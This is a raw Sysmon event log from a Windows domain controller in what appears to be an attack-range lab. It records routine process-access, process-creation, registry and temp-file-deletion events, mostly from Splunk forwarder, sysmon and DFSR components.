21:07:55.679{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A2AB-60D3-1A06-00000000CF01}5136C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AB-60D3-1A06-00000000CF01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.680{4DB9351A-A2AB-60D3-1A06-00000000CF01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000024141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:07:56.991{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x800000000000000024140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:07:56.991{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\9F667F05-E98B-4538-82BE-6312C93AD303\Config SourceDWORD (0x00000001) 13241300x800000000000000024139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:07:56.991{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\9F667F05-E98B-4538-82BE-6312C93AD303\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_9F667F05-E98B-4538-82BE-6312C93AD303.XML 10341000x800000000000000024138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AC-60D3-1B06-00000000CF01}6836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:56.944{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:56.944{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A2AC-60D3-1B06-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AC-60D3-1B06-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.945{4DB9351A-A2AC-60D3-1B06-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.929{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9624D067B84716E656B9B53DF0470991,SHA256=50F037EF287A5FC07EAF4D66F59C71610438B358B19AAB9043C70DB0E553F41C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:56.694{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D29BBD09B2C1754A0D37509C6743F6DC,SHA256=364ABEC8183717D3D9E955D73D223110C025B9D260264FE85D921EB111DE94E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.976{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\grtzj3ew.sqvMD5=7C09F02F76DC730B02660289129643B9,SHA256=D1EF8BB7C9247B45A4775BF9670E2401D99F80F9EED7F5B5F5DB20E555AC1FBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.960{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\sbwn0pc2.h3aMD5=E03035327737E82CADD030EC3B31ED37,SHA256=EE3EB68CC16297C84B7A23E37013333AED3FA9FE4EF05334591B35B0B46D23C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.944{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\txgoflsn.k44MD5=FBEFEF4E10D20E77768ECE3AD46D76E4,SHA256=4ED1F804524EF106CEBDAF0EE438F8E8030BC6712204CF222F76D40AFCDEBD17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:57.913{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\x2mivsxb.vxsMD5=9782AA4C5536B3CC56ABA1AAE44C153C,SHA256=A6BE65D6BDFEABB8BFB59FAD868FAAEA9A324139A9DAF913C4CB99683C3FE2CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\qzfgpozu.ocjMD5=C6F13ED42AE5C0EF4EF3A5AEA74AEDFA,SHA256=705C76FD7AF58E9D58722FCBD2A2B961AC6EF6D6F36B731EE47D6D92EB9BDE66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AD-60D3-1C06-00000000CF01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:57.882{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:57.882{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A2AD-60D3-1C06-00000000CF01}4728C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AD-60D3-1C06-00000000CF01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.883{4DB9351A-A2AD-60D3-1C06-00000000CF01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.851{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\tkceuvlb.kvjMD5=6C567765F0CA1DEFAB41E64FC9BA38AD,SHA256=0F5E93DA37D4709EB6B0C08E6515F2F8413CADBE55FC7C0EA3B67AF406B936E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.835{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\ifi40drg.ft4MD5=80675050C8B3C7ECB6479E24B2F4D3D2,SHA256=B6B905283595B90EAF630051788456F36E85D48A27372F87AB620DD99CAFA2F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.819{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\eehmknuo.k0tMD5=26C50195ABBFDE6611A4CAEE3585960B,SHA256=B2915EDDDBD8029336C3933115B8D8E9471FB63039177901606C5D101770E059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
